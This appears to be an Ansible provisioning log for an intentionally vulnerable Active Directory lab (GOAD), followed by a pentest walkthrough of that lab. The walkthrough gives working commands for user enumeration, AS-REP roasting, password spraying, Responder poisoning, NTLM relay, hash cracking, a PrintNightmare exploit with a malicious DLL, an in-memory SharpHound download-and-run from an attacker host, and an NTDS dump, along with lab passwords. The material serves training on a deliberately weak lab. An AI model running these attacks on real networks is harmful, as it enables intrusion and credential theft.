[started TASK: mssql : Wait for port 1433 to become open on the host, start checking every 5 seconds on srv02]
TASK [mssql : Wait for port 1433 to become open on the host, start checking every 5 seconds] ***************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Add MSSQL admin on srv02]
TASK [mssql : Add MSSQL admin] *****************************************************************************************************************************************************************************
changed: [srv02] => (item=NORTH\jon.snow)
[started TASK: mssql : Add IMPERSONATE on login on srv02]
TASK [mssql : Add IMPERSONATE on login] ********************************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'NORTH\\samwell.tarly', 'value': 'sa'})
changed: [srv02] => (item={'key': 'NORTH\\brandon.stark', 'value': 'NORTH\\jon.snow'})
[started TASK: mssql : Add IMPERSONATE on user on srv02]
TASK [mssql : Add IMPERSONATE on user] *********************************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'arya_master_dbo', 'value': {'user': 'NORTH\\arya.stark', 'db': 'master', 'impersonate': 'dbo'}})
changed: [srv02] => (item={'key': 'arya_dbms_dbo', 'value': {'user': 'NORTH\\arya.stark', 'db': 'msdb', 'impersonate': 'dbo'}})
[started TASK: mssql : Enable sa account on srv02]
TASK [mssql : Enable sa account] ***************************************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : enable MSSQL authentication and windows authent on srv02]
TASK [mssql : enable MSSQL authentication and windows authent] *********************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : Restart service MSSQL on srv02]
TASK [mssql : Restart service MSSQL] ***********************************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql_link : Create SQL Linked server and enable RPC on srv02]
[started TASK: mssql_link : create logins on srv02]
[started TASK: mssql_link : default login impersonation on srv02]
PLAY [Install SQL Server Management Studio] ****************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql_ssms : check SQL Server Manager Studio installer exists on srv02]
TASK [mssql_ssms : check SQL Server Manager Studio installer exists] ***************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql_ssms : get the installer on srv02]
TASK [mssql_ssms : get the installer] **********************************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql_ssms : check SSMS installation already done on srv02]
TASK [mssql_ssms : check SSMS installation already done] ***************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql_ssms : Install SSMS on srv02]
TASK [mssql_ssms : Install SSMS] ***************************************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql_ssms : Reboot after install on srv02]
TASK [mssql_ssms : Reboot after install] *******************************************************************************************************************************************************************
changed: [srv02]
[WARNING]: Could not match supplied host pattern, ignoring: mssql_reporting
PLAY [Install SQL Server reporting] ************************************************************************************************************************************************************************
skipping: no hosts matched
PLAY [Install Webdav] **************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: webdav : Ensure WebDAV client feature is installed on srv02]
TASK [webdav : Ensure WebDAV client feature is installed] **************************************************************************************************************************************************
changed: [srv02]
[started TASK: webdav : Reboot after installing WebDAV client feature on srv02]
TASK [webdav : Reboot after installing WebDAV client feature] **********************************************************************************************************************************************
changed: [srv02]
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=6 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
dc02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
srv02 : ok=46 changed=16 unreachable=0 failed=0 skipped=7 rescued=0 ignored=0
[*] Run playbook : security.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
security.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [Setup enable defender] *******************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
[started TASK: settings/windows_defender : Install windows defender on dc01]
[started TASK: settings/windows_defender : Install windows defender on dc02]
TASK [settings/windows_defender : Install windows defender] ************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
[started TASK: settings/windows_defender : Reboot if needed on dc01]
[started TASK: settings/windows_defender : Reboot if needed on dc02]
[started TASK: settings/windows_defender : Disable windows defender sending sample on dc01]
[started TASK: settings/windows_defender : Disable windows defender sending sample on dc02]
TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [dc02]
changed: [dc01]
[started TASK: settings/windows_defender : Disable windows defender sending sample on dc01]
[started TASK: settings/windows_defender : Disable windows defender sending sample on dc02]
TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [dc01]
changed: [dc02]
[started TASK: settings/windows_defender : Disable network drive scanning on dc01]
[started TASK: settings/windows_defender : Disable network drive scanning on dc02]
[started TASK: settings/windows_defender : Disable realtime monitoring on dc01]
[started TASK: settings/windows_defender : Disable realtime monitoring on dc02]
PLAY [Setup disable defender] ******************************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: settings/windows_defender : Install windows defender on srv02]
TASK [settings/windows_defender : Install windows defender] ************************************************************************************************************************************************
ok: [srv02]
[started TASK: settings/windows_defender : Reboot if needed on srv02]
[started TASK: settings/windows_defender : Disable windows defender sending sample on srv02]
TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [srv02]
[started TASK: settings/windows_defender : Disable windows defender sending sample on srv02]
TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [srv02]
[started TASK: settings/windows_defender : Disable network drive scanning on srv02]
TASK [settings/windows_defender : Disable network drive scanning] ******************************************************************************************************************************************
changed: [srv02]
[started TASK: settings/windows_defender : Disable realtime monitoring on srv02]
TASK [settings/windows_defender : Disable realtime monitoring] *********************************************************************************************************************************************
changed: [srv02]
PLAY [Setup security with tasks] ***************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: include_role : security/{{secu}} on dc01]
[started TASK: include_role : security/{{secu}} on dc02]
[started TASK: include_role : security/{{secu}} on srv02]
TASK [include_role : security/{{secu}}] ********************************************************************************************************************************************************************
[started TASK: security/account_is_sensitive : Account is sensitive on dc01]
TASK [security/account_is_sensitive : Account is sensitive] ************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'renly', 'value': {'account': 'renly.baratheon'}})
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=12 changed=3 unreachable=0 failed=0 skipped=4 rescued=0 ignored=0
dc02 : ok=6 changed=2 unreachable=0 failed=0 skipped=4 rescued=0 ignored=0
srv02 : ok=8 changed=4 unreachable=0 failed=0 skipped=2 rescued=0 ignored=0
[*] Run playbook : vulnerabilities.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
vulnerabilities.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [Setup vulnerabilities with tasks] ********************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: include_role : vulns/{{vuln}} on dc01]
[started TASK: include_role : vulns/{{vuln}} on dc02]
[started TASK: include_role : vulns/{{vuln}} on srv02]
TASK [include_role : vulns/{{vuln}}] ***********************************************************************************************************************************************************************
[started TASK: vulns/disable_firewall : Disable Domain firewall on dc01]
[started TASK: vulns/disable_firewall : Disable Domain firewall on dc02]
[started TASK: vulns/disable_firewall : Disable Domain firewall on srv02]
TASK [vulns/disable_firewall : Disable Domain firewall] ****************************************************************************************************************************************************
changed: [srv02]
changed: [dc02]
changed: [dc01]
[started TASK: vulns/directory : Create directory on dc01]
[started TASK: vulns/directory : Create directory on dc02]
[started TASK: vulns/directory : Create directory on srv02]
TASK [vulns/directory : Create directory] ******************************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'shares', 'value': 'C:\\shares'})
changed: [dc02] => (item={'key': 'setup', 'value': 'c:\\setup'})
changed: [dc01] => (item={'key': 'setup', 'value': 'c:\\setup'})
changed: [srv02] => (item={'key': 'all', 'value': 'C:\\shares\\all'})
[started TASK: vulns/files : Copy a single file on dc01]
[started TASK: vulns/files : Copy a single file on dc02]
[started TASK: vulns/files : Copy a single file on srv02]
TASK [vulns/files : Copy a single file] ********************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'rdp', 'value': {'src': 'dc02/bot_rdp.ps1', 'dest': 'c:\\setup\\bot_rdp.ps1'}})
changed: [dc01] => (item={'key': 'template', 'value': {'src': 'dc01/templates/', 'dest': 'C:\\setup\\'}})
changed: [srv02] => (item={'key': 'website', 'value': {'src': 'srv02/wwwroot', 'dest': 'C:\\inetpub\\'}})
changed: [dc02] => (item={'key': 'sysvol_fake_script', 'value': {'src': 'dc02/sysvol_scripts/script.ps1', 'dest': 'C:\\Windows\\SYSVOL\\domain\\scripts\\script.ps1'}})
changed: [srv02] => (item={'key': 'letter_in_shares', 'value': {'src': 'srv02/all/arya.txt', 'dest': 'C:\\shares\\all\\arya.txt'}})
changed: [dc02] => (item={'key': 'sysvol_secret', 'value': {'src': 'dc02/sysvol_scripts/secret.ps1', 'dest': 'C:\\Windows\\SYSVOL\\domain\\scripts\\secret.ps1'}})
[started TASK: vulns/adcs_templates : Refresh on dc01]
TASK [vulns/adcs_templates : Refresh] **********************************************************************************************************************************************************************
changed: [dc01]
[started TASK: vulns/adcs_templates : Install ADCSTemplate Module on dc01]
TASK [vulns/adcs_templates : Install ADCSTemplate Module] **************************************************************************************************************************************************
changed: [dc01]
[started TASK: vulns/adcs_templates : create a directory for templates on dc01]
TASK [vulns/adcs_templates : create a directory for templates] *********************************************************************************************************************************************
ok: [dc01]
[started TASK: vulns/adcs_templates : Install templates on dc01]
TASK [vulns/adcs_templates : Install templates] ************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'ESC1', 'value': {'template_name': 'ESC1', 'template_file': 'C:\\setup\\ESC1.json'}})
[started TASK: vulns/credentials : Store a password in Credential Manager on dc02]
TASK [vulns/credentials : Store a password in Credential Manager] ******************************************************************************************************************************************
changed: [dc02] => (item={'key': 'TERMSRV/castelblack', 'value': {'username': 'north\\robb.stark', 'secret': 'sexywolfy', 'runas': 'north\\robb.stark', 'runas_password': 'sexywolfy'}})
[started TASK: vulns/autologon : Add windows autologon on dc02]
TASK [vulns/autologon : Add windows autologon] *************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'robb.stark', 'value': {'username': 'north\\robb.stark', 'password': 'sexywolfy'}})
[started TASK: vulns/ntlmdowngrade : Enable LmCompatibilityLevel on dc02]
TASK [vulns/ntlmdowngrade : Enable LmCompatibilityLevel] ***************************************************************************************************************************************************
changed: [dc02]
[started TASK: vulns/enable_llmnr : Enable LLMNR protocol on dc02]
TASK [vulns/enable_llmnr : Enable LLMNR protocol] **********************************************************************************************************************************************************
changed: [dc02]
[started TASK: vulns/enable_nbt-ns : Enable NBT-NS protocol on dc02]
TASK [vulns/enable_nbt-ns : Enable NBT-NS protocol] ********************************************************************************************************************************************************
changed: [dc02]
[started TASK: vulns/shares : Create directory if not exist on dc02]
[started TASK: vulns/shares : Create share on dc02]
[started TASK: vulns/shares : include_tasks on dc02]
[started TASK: vulns/shares : include_tasks on dc02]
[started TASK: vulns/shares : include_tasks on dc02]
[started TASK: vulns/shares : include_tasks on dc02]
[started TASK: vulns/openshares : Ensure directory structure for public share exists on srv02]
TASK [vulns/openshares : Ensure directory structure for public share exists] *******************************************************************************************************************************
changed: [srv02]
[started TASK: vulns/openshares : Ensure public share exists on srv02]
TASK [vulns/openshares : Ensure public share exists] *******************************************************************************************************************************************************
changed: [srv02]
[started TASK: vulns/openshares : Add or update registry path to allow guest access in SMB on srv02]
TASK [vulns/openshares : Add or update registry path to allow guest access in SMB] *************************************************************************************************************************
changed: [srv02]
[started TASK: vulns/openshares : activate guest account on srv02]
TASK [vulns/openshares : activate guest account] ***********************************************************************************************************************************************************
changed: [srv02]
[started TASK: vulns/openshares : Ensure directory structure for all share exists on srv02]
TASK [vulns/openshares : Ensure directory structure for all share exists] **********************************************************************************************************************************
ok: [srv02]
[started TASK: vulns/openshares : Add all share everyone rights on srv02]
TASK [vulns/openshares : Add all share everyone rights] ****************************************************************************************************************************************************
changed: [srv02]
[started TASK: vulns/openshares : all shares on srv02]
TASK [vulns/openshares : all shares] ***********************************************************************************************************************************************************************
changed: [srv02]
[started TASK: vulns/permissions : change folder allow rights on srv02]
TASK [vulns/permissions : change folder allow rights] ******************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'IIS_IUSRS_upload', 'value': {'path': 'C:\\inetpub\\wwwroot\\upload', 'user': 'IIS_IUSRS', 'rights': 'FullControl'}})
[started TASK: include_role : ps on dc01]
[started TASK: include_role : ps on dc02]
[started TASK: include_role : ps on srv02]
TASK [include_role : ps] ***********************************************************************************************************************************************************************************
[started TASK: ps : Play task {{ps_script}} on dc02]
TASK [ps : Play task ../ad/GOAD-Light/scripts/asrep_roasting.ps1] ******************************************************************************************************************************************
changed: [dc02]
[started TASK: ps : Play task {{ps_script}} on dc02]
TASK [ps : Play task ../ad/GOAD-Light/scripts/constrained_delegation_use_any.ps1] **************************************************************************************************************************
changed: [dc02]
[started TASK: ps : Play task {{ps_script}} on dc02]
TASK [ps : Play task ../ad/GOAD-Light/scripts/constrained_delegation_kerb_only.ps1] ************************************************************************************************************************
changed: [dc02]
[started TASK: ps : Play task {{ps_script}} on dc02]
TASK [ps : Play task ../ad/GOAD-Light/scripts/ntlm_relay.ps1] **********************************************************************************************************************************************
changed: [dc02]
[started TASK: ps : Play task {{ps_script}} on dc02]
TASK [ps : Play task ../ad/GOAD-Light/scripts/responder.ps1] ***********************************************************************************************************************************************
changed: [dc02]
[started TASK: ps : Play task {{ps_script}} on dc02]
TASK [ps : Play task ../ad/GOAD-Light/scripts/gpo_abuse.ps1] ***********************************************************************************************************************************************
changed: [dc02]
[started TASK: ps : Play task {{ps_script}} on dc02]
TASK [ps : Play task ../ad/GOAD-Light/scripts/rdp_scheduler.ps1] *******************************************************************************************************************************************
changed: [dc02]
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=14 changed=6 unreachable=0 failed=0 skipped=2 rescued=0 ignored=0
dc02 : ok=17 changed=15 unreachable=0 failed=0 skipped=6 rescued=0 ignored=0
srv02 : ok=13 changed=10 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
[*] Lab successfully provisioned in 01:49:15
bolke@hacky:~/GOAD$
bolke@hacky:~/GOAD$
.
just a simple writeup
.
—-
🧪 Lab info
🖥️ Hosts
📄 Hosts file
To use kerberos we need add DNS in
/etc/hostsfile, mandatory for Kerberos (FQDN resolution)You can generate hosts file with
netexec192.168.200.10 kingslanding sevenkingdoms.local kingslanding.sevenkingdoms.local 192.168.200.11 winterfell north.sevenkingdoms.local winterfell.north.sevenkingdoms.local 192.168.200.12 meereen essos.local meereen.essos.local 192.168.200.22 castelblack castelblack.north.sevenkingdoms.local 192.168.200.23 braavos braavos.essos.local 192.168.200.31 casterlyrock casterlyrock.sevenkingdoms.local🔑 Credentials
🔍 Recon
🔵 SMB recon with netexec
By default, Microsoft enables SMB signing on Domain Controllers. In secure environments, SMB signing should be enforced network-wide to prevent NTLM relay attacks.
3 Domains found!!
🔵 All ports scan with Nmap
sudo nmap -sSV -p- -Pn --open --reason --max-retries 2 --host-timeout 10m --min-rate 500 --scan-delay 50ms --script "vulners,http-title,http-server-header" --script-args vulners.showall=true,http.useragent="Mozilla/5.0",http.pipeline=1 -T3 -oA all_ports_goad -vvv -iL aliveGOAD Open Ports
Finding users
Anonymous SMB Users enumeration with netexec and anonymous sessions allowed
Found credentials of Samwell Tarly in description field.
NORTH\samwell.tarly:HeartsbaneWe were able to enumerate users and groups because
WINTERFELLallows anonymous connections.🔷 Anonymous SMB Users enumeration without anonymous sessions
Generate a usernames wordlist from GOT website
The GOT website contains name and firstname of all actors.
With the following command we obtain a list
FirstName + LastNameextracted from the HTLM fieldaria-label, we eliminate the special characters, sorted alphabetically without repeating and taking into account that there may be actors without a last name.curl -s \ -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" \ https://www.hbo.com/game-of-thrones/cast-and-crew \ | grep 'href="/game-of-thrones/cast-and-crew/' \ | grep -o 'aria-label="[^"]*"' \ | cut -d '"' -f 2 \ | sed -E 's/[^a-zA-Z. ]//g' \ | awk '{if(NF == 2) {print $1" "$2} else {print $1}}' \ | sort -u > got_website_usernames.txtThe following code is a modification of Namemash script to be able to generate users only with the first name, without last name.
import sys import os.path def generate_usernames(name): """Generates a list of possible usernames from a given name. Args: name: The name (full name or single name) to generate usernames from. Returns: A list of generated usernames. """ lowercase_name = name.lower().strip() tokens = lowercase_name.split() usernames = [] if len(tokens) == 1: # Handle single-name user # Use the single name and its variations for usernames usernames.append(lowercase_name) else: # Assume traditional first and last name for multiple tokens first_name, last_name = tokens[0], ' '.join(tokens[1:]) # Generate usernames using different combinations of first and last name usernames.append(first_name + last_name) usernames.append(last_name + first_name) usernames.append(first_name + '.' + last_name) usernames.append(last_name + '.' + first_name) usernames.append(last_name + first_name[0]) usernames.append(first_name[0] + last_name) usernames.append(last_name[0] + first_name) usernames.append(first_name[0] + '.' + last_name) usernames.append(last_name[0] + '.' + first_name) usernames.append(first_name) usernames.append(last_name) return usernames if __name__ == '__main__': if len(sys.argv) != 2: print(f'usage: {sys.argv[0]} names.txt') sys.exit(0) if not os.path.exists(sys.argv[1]): print(f'{sys.argv[1]} not found') sys.exit(0) with open(sys.argv[1]) as f: for line in f: name = line.strip() usernames = generate_usernames(name) for username in usernames: print(username)Nmap Username Enumeration without anonymous session
kingslanding
sudo nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=possible_usernames.txt" kingslandingFound 7 users in
sevenkingdoms.localdomain.meereen
sudo nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=possible_usernames.txt" meereenFound 5 users in
essos.localdomain.ASREP Roasting
I create a
north_users.txtwith all usernames previously found.Found
NORTH\brandon.stark:iseedeadpeoplecredentials.Password Spraying
This technique can block users
View password policy
The password policy show us that if we fail 5 times in 5 minutes we lock the accounts for 5 minutes.
View Bad Password Count
We need any user credentials
Spraying username=password
Found
NORTH\hodor:hodorcredentials.Domain Enumeration
Get Domain Usernames
Getting usernames from north.sevenkingdoms.local domain
Getting usernames from sevenkingdoms.local domain
We can request users from sevenkingdoms.local domain because there is a trust present.
ldapsearch -H ldap://kingslanding -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'Getting usernames from essos.local domain
We have no credentials to list this domain, at the moment. 😈
BloodHound
DO NOT USE bloodhound.py
RDP Brandon Strak – Winterfell
Enumerate domains
# Execute BloodHound in memory $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.100.223/SharpHound.exe') $assem = [System.Reflection.Assembly]::Load($data) [Sharphound.Program]::Main("--collectionmethods All --domain north.sevenkingdoms.local --searchforest true --outputdirectory c:\users\public\ --zipfilename bh_north_sevenkingdoms.zip".Split())Enumerate too sevenkingdoms.local and essos.local domains.
Custom queries
All domains and computers
All domains and users
All domains, computers, groups and users
View ACL users
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN pList All users and setting pwned!
Kerberoasting
Search users with SPN (Server Principal Name) enabled.
Impacket
Crackmapexec
crackmapexec ldap winterfell -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting kerberoasting.hashesCracking kerberoasting.hashes with hashcat
Found
NORTH/jon.snow:iknownothingcredentials.Relay and Poisoning
Responder
In the lab, there are two bots to simulate LLMRN, MDNS and NBT-NS requests. One user has a weak password but no admin right. Another user has admin rights but uses a strong password.
sudo python3 Responder.py -I vboxnet0 # Wait 5 minutesThe bot try to make a smb connection to bravos instead of braavos. The DNS doesn’t know bravos without two ‘a’ so by default windows will send a broadcast request to find the associated computer. With responder we answer to that broadcast query and say that this server is us, and so we get the connection from the user.
The NetNTLM hashes are not usable to do pass the hash, but you can crack them to retrieve the password.
Cracking with hashcat
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.ruleFound credentials of Robb Stark when cracking hash.
NORTH\robb.stark:sexywolfyWith Robb Stark we pwned NORTH domain, is an Administrator of Winterfell (North DC).
NTLM Relay
Unsigned SMB
Now we have a list of computer with
signing:FalseResponder + NTLMRelayx – SMB
Before starting Responder to poison the answer to LLMNR, MDNS and NBT-NS request we must stop the responder SMB and HTTP Server as we don’t want to get the hashes directly but we want to relay them to NTLMRelayx.
sed -i 's/HTTP = On/HTTP = Off/g' ~/Responder/Responder.conf && cat ~/Responder/Responder.conf | grep --color=never 'HTTP =' sed -i 's/SMB = On/SMB = Off/g' ~/Responder/Responder.conf && cat ~/Responder/Responder.conf | grep --color=never 'SMB ='Start Responder (check if HTTP and SMB is OFF)
Start NTLMRelayx
-tf: list of targets to relay the authentication-of: output file, this will keep the captured smb hashes just like we did before with responder, to crack them later-smb2support: support for smb2-socks: will start a socks proxy to use relayed authenticationIf you get a error of jinja2, try:
pip3 install Flask Jinja2 --upgradeThe poisoned connections are relayed to castelblack (192.168.56.22) and essos (192.168.56.23) and a socks proxy is setup to use the connection.
As eddard.stark is a domain administrator of north.sevenkingdoms.local he got administrator privileges on castelback.
Now we can use this relay to get an access to the computer as an administrator.
MITM6 + NTLMRelayx – LDAP
(Pending)
Domain Enum with credentials
Check MachineAccountQuota (by default any user can create 10)
impacket-addcomputer -computer-name 'samaccountname$' -computer-pass '1Qwerty(' -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH 'north.sevenkingdoms.local/jon.snow:iknownothing'python ./krbrelayx/addspn.py --clear -t 'samaccountname$' -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' 'winterfell.north.sevenkingdoms.local'python ./krbrelayx/renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing(Pending…)
PrintNightmare
impacket-rpcdump 192.168.56.10 | egrep 'MS-RPRN|MS-PAR'Prepare malicious dll
nightmare.c
Compile
sudo impacket-smbserver -comment "SHARE" SMB /home/jolmedo/smb -smb2supportDownload and execute exploit
git clone https://github.com/cube0x0/CVE-2021-1675python3 CVE-2021-1675.py essos.local/jorah.mormont:'H0nnor!'@meereen.essos.local '\\192.168.100.223\smb\nightmare.dll'Testing new user
python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@north.sevenkingdoms.local '\\192.168.100.223\smb\nightmare.dll'Exploit Windows Server 2019 – Winterfell
The above exploit works but does not add the user to the admin group because it is caught by Windows Defender.
https://github.com/newsoft/adduser
adduser.c
sudo impacket-smbserver -comment "SHARE" SMB /home/jolmedo/smb -smb2supportpython3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@north.sevenkingdoms.local '\\192.168.100.223\smb\nightmare.dll'Dumping all hashes
netexec smb winterfell.north.sevenkingdoms.local -u jolmedo -p '1Qwerty!' -M ntdsutilDon’t forget to clean 🧹
Connect RDP
You will find your dlls inside:
C:\Windows\System32\spool\drivers\x64\3C:\Windows\System32\spool\drivers\x64\3\Old\{id}\ADCS
https://github.com/topotam/PetitPotam
This attack not works on update AD